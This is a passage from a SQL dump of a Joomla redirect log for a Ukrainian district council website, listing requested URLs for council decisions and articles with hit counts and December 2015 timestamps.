00:00:00',301),(22624,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/364-pro-pogodzhennja-perejmenuvannja-naselenih-punktiv','','','',4,0,'2015-12-27 10:11:59','0000-00-00 00:00:00',301),(22625,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/364-pro-pogodzhennja-perejmenuvannja-naselenih-punktiv?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-27 10:12:05','0000-00-00 00:00:00',301),(22626,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/381-pro-peredachu-neruhomogo-majna-shho-perebuvae-u_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-27 10:12:14','0000-00-00 00:00:00',301),(22627,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku/1188-pro-vnesennya-zmin-do-strukturi-vikonavchogo-aparatu-rajonnoji-radi','','','',4,0,'2015-12-27 10:18:06','0000-00-00 00:00:00',301),(22628,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku/1188-pro-vnesennya-zmin-do-strukturi-vikonavchogo-aparatu-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-27 10:18:11','0000-00-00 00:00:00',301),(22629,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku/1190-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-pro-normativnu-groshovu-otsinku-zemelnoji-dilyanki-shcho-peredaetsya-v-orendu-tov-yunigran','','','',4,0,'2015-12-27 10:18:13','0000-00-00 00:00:00',301),(22630,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku/1193-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi','','','',4,0,'2015-12-27 10:18:15','0000-00-00 00:00:00',301),(22631,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku/1193-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-27 10:18:17','0000-00-00 00:00:00',301),(22632,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku/1194-pro-programu-vidshkoduvannya-vidsotkiv-za-kreditami-otrimanimi-naselennyam-malinskogo-rajonu-na-vprovadzhennya-energozberigayuchikh-zakhodiv-u-2015-rotsi','','','',4,0,'2015-12-27 10:18:19','0000-00-00 00:00:00',301),(22633,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku/1199-pro-zatverdzhennya-polozhennya-pro-poryadok-nadannya-pilg-z-orendnoji-plati-za-majno-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-rajonu','','','',4,0,'2015-12-27 10:18:21','0000-00-00 00:00:00',301),(22634,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku/1200-pro-povtorne-zvernennya-do-prokuraturi-malinskogo-rajonu?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-12-27 10:18:26','0000-00-00 00:00:00',301),(22635,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku/1202-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2015-rik?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-12-27 10:18:29','0000-00-00 00:00:00',301),(22636,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-?start=15','','','',3,0,'2015-12-27 10:28:57','0000-00-00 00:00:00',301),(22637,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=119&lang=uk&Itemid=0','','','',1,0,'2015-12-27 10:30:07','0000-00-00 00:00:00',301),(22638,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30042014-?limitstart=0','','','',3,0,'2015-12-27 10:30:54','0000-00-00 00:00:00',301),(22640,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=236:-192011-&catid=32:2011-03-31-12-03-04&Itemid=64&lang=en','','','',1,0,'2015-12-27 10:37:01','0000-00-00 00:00:00',301),(22641,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=236:-192011-&catid=11&Itemid=16&lang=ru','','','',1,0,'2015-12-27 10:38:06','0000-00-00 00:00:00',301),(22642,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=236:-192011-&catid=11:2010-06-05-14-33-33&Itemid=16&lang=uk','','','',2,0,'2015-12-27 10:49:23','0000-00-00 00:00:00',301),(22644,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=459:15-2011-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2015-12-27 10:56:04','0000-00-00 00:00:00',301),(22645,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=47:-21022013-&layout=blog&Itemid=86&lang=en&limitstart=5','','','',3,0,'2015-12-27 11:21:39','0000-00-00 00:00:00',301),(22646,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-?start=5','','','',4,0,'2015-12-27 11:55:21','0000-00-00 00:00:00',301),(22647,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=45&layout=blog&Itemid=84&lang=uk&limitstart=30','','','',1,0,'2015-12-27 11:57:34','0000-00-00 00:00:00',301),(22648,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=503:-2017-&catid=38:--19122011-&Itemid=73&lang=uk','','','',1,0,'2015-12-27 12:25:03','0000-00-00 00:00:00',301),(22649,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=39&Itemid=76&lang=en&limitstart=5','','','',3,0,'2015-12-27 12:58:55','0000-00-00 00:00:00',301),(22650,'http://malyn-rayrada.org.ua/up.php?sendfile=true','','','',1,0,'2015-12-27 15:44:48','0000-00-00 00:00:00',301),(22651,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=en&id=article','','','',94,0,'2015-12-27 16:38:39','0000-00-00 00:00:00',301),(22652,'http://malyn-rayrada.org.ua/libraries/image-import.php','','','',1,0,'2015-12-27 17:02:23','0000-00-00 00:00:00',301),(22653,'http://www.malyn-rayrada.org.ua/index.php/540-malinchani-budte-oberezhnimi-pid-chas-moroziv-i_2?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-12-27 17:45:25','0000-00-00 00:00:00',301),(22654,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/13-2010-06-06-05-22-15','','','',20,0,'2015-12-27 17:55:55','0000-00-00 00:00:00',301),(22655,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-49-27/pochesni-gromadyani-rajonu-4-4','','','',7,0,'2015-12-27 17:56:02','0000-00-00 00:00:00',301),(22656,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-49-27/pochesni-gromadyani-rajonu-6-6','','','',4,0,'2015-12-27 17:56:04','0000-00-00 00:00:00',301),(22657,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-49-27/pochesni-gromadyani-rajonu-8-8','','','',4,0,'2015-12-27 17:56:05','0000-00-00 00:00:00',301),(22658,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-49-27/pochesni-gromadyani-rajonu-9-9','','','',4,0,'2015-12-27 17:56:07','0000-00-00 00:00:00',301),(22659,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/malinshchina-i-malinchani-64','','','',4,0,'2015-12-27 17:56:11','0000-00-00 00:00:00',301),(22660,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/malinshchina-i-malinchani-75','','','',6,0,'2015-12-27 17:56:13','0000-00-00 00:00:00',301),(22661,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-23-06-08-04/img-0934-12-106','','','',4,0,'2015-12-27 17:56:16','0000-00-00 00:00:00',301),(22662,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-23-06-08-04/img-1027-17-110','','','',4,0,'2015-12-27 17:56:24','0000-00-00 00:00:00',301),(22663,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo?page=2','','','',12,0,'2015-12-27 17:56:36','0000-00-00 00:00:00',301),(22664,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=13&Itemid=33&lang=uk','','','',12,0,'2015-12-27 18:45:24','0000-00-00 00:00:00',301),(22665,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=347:2011-06-15-12-33-18&catid=34:--15062011-&Itemid=68&lang=en','','','',16,0,'2015-12-27 19:11:41','0000-00-00 00:00:00',301),(22666,'http://www.malyn-rayrada.org.ua/index.php/652-do-vidoma-deputativ-rajonnoi-radi-z-utochnennjam?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-12-27 19:42:55','0000-00-00 00:00:00',301),(22667,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1290-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-iz-zemleustroyu-shchodo-vnesennya-zmin-v-proekt-formuvannya-teritoriji-i-stanovlennya-mezh-malinivskoji-silskoji-radi-malinskogo-ra','','https://www.google.com.ua/','',1,0,'2015-12-27 20:35:46','0000-00-00 00:00:00',301),(22668,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/malinshchina-i-malinchani-79','','','',5,0,'2015-12-27 22:50:56','0000-00-00 00:00:00',301),(22669,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=922:2013-02-11-10-53-17&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2015-12-27 23:34:29','0000-00-00 00:00:00',301),(22670,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=619:-11-6-&Itemid=0&lang=en&option=com_content&view=article','','','',1,0,'2015-12-27 23:34:47','0000-00-00 00:00:00',301),(22671,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=408:------------------2011-&Itemid=70&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-27 23:34:48','0000-00-00 00:00:00',301),(22672,'http://www.malyn-rayrada.org.ua/index.php?catid=53&id=1085:2013-09-11-12-15-54&Itemid=94&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-27 23:34:50','0000-00-00 00:00:00',301),(22673,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1057:--22072013--2100-&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-27 23:35:00','0000-00-00 00:00:00',301),(22674,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1254:-1-50&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-27 23:35:02','0000-00-00 00:00:00',301),(22675,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1140:80-1932-33-l-r&Itemid=0&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-27 23:35:08','0000-00-00 00:00:00',301),(22676,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=627:2012-04-02-15-57-23&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-27 23:35:14','0000-00-00 00:00:00',301),(22677,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=644:2012-04-04-09-52-48&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-27 23:35:25','0000-00-00 00:00:00',301),(22678,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=701:-------------2011-2017-&Itemid=70&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-27 23:35:47','0000-00-00 00:00:00',301),(22679,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1164:2013-12-29-11-46-36&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-27 23:35:50','0000-00-00 00:00:00',301),(22680,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=721:-lr&Itemid=82&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-27 23:36:00','0000-00-00 00:00:00',301),(22681,'http://www.malyn-rayrada.org.ua/index.php?catid=46&id=888:-2012-&Itemid=85&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-27 23:36:02','0000-00-00 00:00:00',301),(22682,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1035:2013-06-25-09-55-31&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-27 23:36:08','0000-00-00 00:00:00',301),(22683,'http://www.malyn-rayrada.org.ua/index.php?catid=37&id=409:-2011-&Itemid=72&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-27 23:36:10','0000-00-00 00:00:00',301),(22684,'http://www.malyn-rayrada.org.ua/index.php?catid=51:--19072013-&id=1053:2013-07-19-11-34-22&Itemid=92&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-27 23:36:13','0000-00-00 00:00:00',301),(22685,'http://www.malyn-rayrada.org.ua/index.php?catid=47&id=918:-2013-2015-&Itemid=86&lang=en&option=com_content&view=article','','','',1,0,'2015-12-27 23:36:30','0000-00-00 00:00:00',301),(22686,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=827:2012-11-20-17-44-21&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-27 23:36:38','0000-00-00 00:00:00',301),(22687,'http://www.malyn-rayrada.org.ua/index.php?catid=56&id=1190:-2014-&Itemid=97&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-27 23:36:44','0000-00-00 00:00:00',301),(22688,'http://www.malyn-rayrada.org.ua/index.php?catid=29&id=192:2010-12-15-13-29-12&Itemid=60&lang=en&option=com_content&view=article','','','',1,0,'2015-12-27 23:36:55','0000-00-00 00:00:00',301),(22689,'http://www.malyn-rayrada.org.ua/index.php?catid=47&id=937:---------------------------21122012--l--&Itemid=86&lang=en&option=com_content&view=article','','','',1,0,'2015-12-27 23:36:59','0000-00-00 00:00:00',301),(22690,'http://www.malyn-rayrada.org.ua/index.php?catid=29:--15122010-&id=206:2010-12-15-14-19-27&Itemid=60&lang=en&option=com_content&view=article','','','',1,0,'2015-12-27 23:39:35','0000-00-00 00:00:00',301),(22691,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=954:-19-6-&Itemid=&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-27 23:39:37','0000-00-00 00:00:00',301),(22692,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1049:2013-07-15-05-50-46&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-27 23:39:49','0000-00-00 00:00:00',301),(22693,'http://www.malyn-rayrada.org.ua/index.php?catid=56&id=1187:2014-01-28-09-43-51&Itemid=97&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-27 23:39:58','0000-00-00 00:00:00',301),(22694,'http://www.malyn-rayrada.org.ua/index.php?catid=6:2010-06-05-12-52-17&id=6:2010-06-05-14-26-47&Itemid=9&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-27 23:40:02','0000-00-00 00:00:00',301),(22695,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1011:2013-05-29-09-51-28&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2015-12-27 23:40:04','0000-00-00 00:00:00',301),(22696,'http://www.malyn-rayrada.org.ua/index.php?catid=37&id=416:2011-09-29-06-48-53&Itemid=72&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-27 23:40:07','0000-00-00 00:00:00',301),(22697,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1010:-22-6-&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-27 23:40:09','0000-00-00 00:00:00',301),(22698,'http://www.malyn-rayrada.org.ua/index.php?catid=49:--12042013-&id=948:-2012-&Itemid=88&lang=en&option=com_content&view=article','','','',1,0,'2015-12-27 23:40:11','0000-00-00 00:00:00',301),(22699,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=646:2012-04-08-07-58-55&lang=en&option=com_content&view=article','','','',3,0,'2015-12-27 23:40:13','0000-00-00 00:00:00',301),(22700,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=751:-15-6-&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-27 23:40:22','0000-00-00 00:00:00',301),(22701,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=468:-15-2011-120-l-r&Itemid=73&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-27 23:40:28','0000-00-00 00:00:00',301),(22702,'http://www.malyn-rayrada.org.ua/index.php?id=56&Itemid=97&lang=uk&layout=blog&limitstart=10&option=com_content&view=category','','','',4,0,'2015-12-27 23:52:46','0000-00-00 00:00:00',301),(22703,'http://www.malyn-rayrada.org.ua/index.php?catid=33:-20052011&id=324:2011-05-20-16-10-02&Itemid=66&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-27 23:52:49','0000-00-00 00:00:00',301),(22704,'http://www.malyn-rayrada.org.ua/index.php?catid=29&id=196:---------------------2005-2010-&Itemid=60&lang=en&option=com_content&view=article','','','',1,0,'2015-12-27 23:56:24','0000-00-00 00:00:00',301),(22705,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1186:-------2013--------i--2014--&Itemid=70&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-27 23:58:17','0000-00-00 00:00:00',301),(22706,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45?catid=58&id=1306:2014-04-30-09-40-02&lang=uk','','','',3,0,'2015-12-27 23:58:28','0000-00-00 00:00:00',301),(22707,'http://www.malyn-rayrada.org.ua/index.php?catid=54:--29112013-&id=1152:2013-11-28-14-58-05&Itemid=95&lang=en&option=com_content&view=article','','','',2,0,'2015-12-27 23:58:32','0000-00-00 00:00:00',301),(22708,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=750:2012-09-01-09-40-02&Itemid=0&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-27 23:58:34','0000-00-00 00:00:00',301),(22709,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=651:-2012-&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2015-12-27 23:58:36','0000-00-00 00:00:00',301),(22710,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1107:c-&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-27 23:58:54','0000-00-00 00:00:00',301),(22711,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=963:2013-03-13-06-16-53&Itemid=&lang=en&option=com_content&view=article','','','',1,0,'2015-12-27 23:58:56','0000-00-00 00:00:00',301),(22712,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=707:--------231--280312--l-------2012-r&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2015-12-27 23:59:04','0000-00-00 00:00:00',301),(22713,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=774:2012-10-02-09-30-45&Itemid=84&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 00:10:02','0000-00-00 00:00:00',301),(22714,'http://www.malyn-rayrada.org.ua/index.php?catid=56&id=1195:2014-01-28-13-01-27&Itemid=97&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 00:10:07','0000-00-00 00:00:00',301),(22715,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1085:2013-09-11-12-15-54&Itemid=70&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 00:10:11','0000-00-00 00:00:00',301),(22716,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1063:2013-08-02-17-32-04&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-28 00:10:13','0000-00-00 00:00:00',301),(22717,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=795:-20-2011-108-l-r-&Itemid=84&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 00:10:15','0000-00-00 00:00:00',301),(22718,'http://www.malyn-rayrada.org.ua/index.php?catid=56:--03022014-&id=1194:-2012-2015-&Itemid=97&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 00:10:24','0000-00-00 00:00:00',301),(22719,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=501:2011-12-14-13-07-32&Itemid=73&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 00:18:29','0000-00-00 00:00:00',301),(22720,'http://www.malyn-rayrada.org.ua/index.php/--03022014-/605-pro-vikonannja-planu-roboti-rajonnoi-radi-za-2013','','','',4,0,'2015-12-28 00:28:40','0000-00-00 00:00:00',301),(22721,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=464:2011-11-11-12-15-19&Itemid=73&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 00:35:31','0000-00-00 00:00:00',301),(22722,'http://www.malyn-rayrada.org.ua/index.php?catid=40:--28032012-&id=582:2012-02-27-13-18-37&Itemid=77&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 00:35:33','0000-00-00 00:00:00',301),(22723,'http://www.malyn-rayrada.org.ua/index.php?catid=33:-20052011&id=320:-2010-2014-&Itemid=66&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 00:35:48','0000-00-00 00:00:00',301),(22724,'http://www.malyn-rayrada.org.ua/index.php?catid=37&id=418:2011-09-29-08-40-03&Itemid=72&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 00:35:50','0000-00-00 00:00:00',301),(22725,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=412:------165------&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-28 00:35:52','0000-00-00 00:00:00',301),(22726,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=760:-qq-24-2012-&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 00:36:06','0000-00-00 00:00:00',301),(22727,'http://www.malyn-rayrada.org.ua/index.php?catid=10:2010-06-05-13-46-44&id=1288:2014-04-23-06-50-40&Itemid=17&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-28 00:36:18','0000-00-00 00:00:00',301),(22728,'http://www.malyn-rayrada.org.ua/index.php?catid=51:--19072013-&id=1052:2013-07-19-11-32-33&Itemid=92&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 00:36:20','0000-00-00 00:00:00',301),(22729,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1127:2013-11-05-12-58-04&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-28 00:36:28','0000-00-00 00:00:00',301),(22730,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=750:2012-09-01-09-40-02&Itemid=14&lang=en&option=com_content&view=article','','','',3,0,'2015-12-28 00:36:29','0000-00-00 00:00:00',301),(22731,'http://www.malyn-rayrada.org.ua/index.php?id=6:2010-06-05-12-52-17&Itemid=9&lang=en&layout=blog&option=com_content&view=category','','','',1,0,'2015-12-28 00:36:31','0000-00-00 00:00:00',301),(22732,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1220:2014-02-21-15-56-19&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 00:36:34','0000-00-00 00:00:00',301),(22733,'http://www.malyn-rayrada.org.ua/index.php?id=39:-22022012-&Itemid=76&lang=uk&layout=blog&limitstart=5&option=com_content&view=category','','','',1,0,'2015-12-28 00:40:39','0000-00-00 00:00:00',301),(22734,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=690:2012-05-29-18-50-09&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 00:50:35','0000-00-00 00:00:00',301),(22735,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1100:2013-10-02-18-03-10&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 00:55:26','0000-00-00 00:00:00',301),(22736,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1046:-2013-&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 00:55:28','0000-00-00 00:00:00',301),(22737,'http://www.malyn-rayrada.org.ua/index.php?id=56&Itemid=97&lang=en&layout=blog&limitstart=15&option=com_content&view=category','','','',1,0,'2015-12-28 00:55:30','0000-00-00 00:00:00',301),(22738,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1257:2014-03-29-18-03-31&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 00:55:39','0000-00-00 00:00:00',301),(22739,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=515:2011-12-22-10-09-17&Itemid=73&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 00:59:32','0000-00-00 00:00:00',301),(22740,'http://www.malyn-rayrada.org.ua/index.php?id=4:2010-06-05-12-51-18&Itemid=8&lang=uk&layout=blog&option=com_content&view=category','','','',1,0,'2015-12-28 01:06:59','0000-00-00 00:00:00',301),(22741,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=860:09&Itemid=0&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-28 01:07:01','0000-00-00 00:00:00',301),(22742,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1012:l-r&Itemid=0&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 01:07:10','0000-00-00 00:00:00',301),(22743,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1185:2014-01-28-09-38-54&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-28 01:07:14','0000-00-00 00:00:00',301),(22744,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1274-pro-likvidatsiyu-lyubovitskoji-ta-shevchenkivskoji-zagalnoosvitnikh-shkil-i-ii-stupeniv','','','',30,0,'2015-12-28 01:21:41','0000-00-00 00:00:00',301),(22745,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=609:-q-q&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 01:28:55','0000-00-00 00:00:00',301),(22746,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1095:2013-09-24-13-25-55&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 01:29:00','0000-00-00 00:00:00',301),(22747,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=693:2012-06-06-14-15-01&Itemid=0&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 01:29:17','0000-00-00 00:00:00',301),(22748,'http://www.malyn-rayrada.org.ua/index.php/1191-dopomozheno-dityam-razom?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-12-28 01:57:45','0000-00-00 00:00:00',301),(22749,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1171:2014-01-11-09-58-40&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 02:07:36','0000-00-00 00:00:00',301),(22750,'http://www.malyn-rayrada.org.ua/index.php/1192-u-chajki-bronza-v-urozhayu-novij-stadion?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-12-28 02:14:36','0000-00-00 00:00:00',301),(22751,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/malinshchina-ta-malinchani/2014-09-22-17-50-18?page=1','','','',6,0,'2015-12-28 02:28:37','0000-00-00 00:00:00',301),(22752,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=762:-210-&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 02:28:42','0000-00-00 00:00:00',301),(22753,'http://www.malyn-rayrada.org.ua/index.php?catid=47:-21022013-&id=935:----------14-112012332-l------r&Itemid=86&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 02:32:31','0000-00-00 00:00:00',301),(22754,'http://www.malyn-rayrada.org.ua/index.php?catid=40:--28032012-&id=589:2012-02-27-13-52-30&Itemid=77&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 02:45:12','0000-00-00 00:00:00',301),(22755,'http://www.malyn-rayrada.org.ua/index.php?catid=54&id=1151:2013-11-28-14-54-33&Itemid=95&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 02:45:17','0000-00-00 00:00:00',301),(22756,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=861:------qq&Itemid=&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 02:57:45','0000-00-00 00:00:00',301),(22757,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=49&layout=blog&Itemid=88&lang=ru','','','',1,0,'2015-12-28 03:09:21','0000-00-00 00:00:00',301),(22758,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=999:2013-04-28-05-21-05&Itemid=0&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 03:23:34','0000-00-00 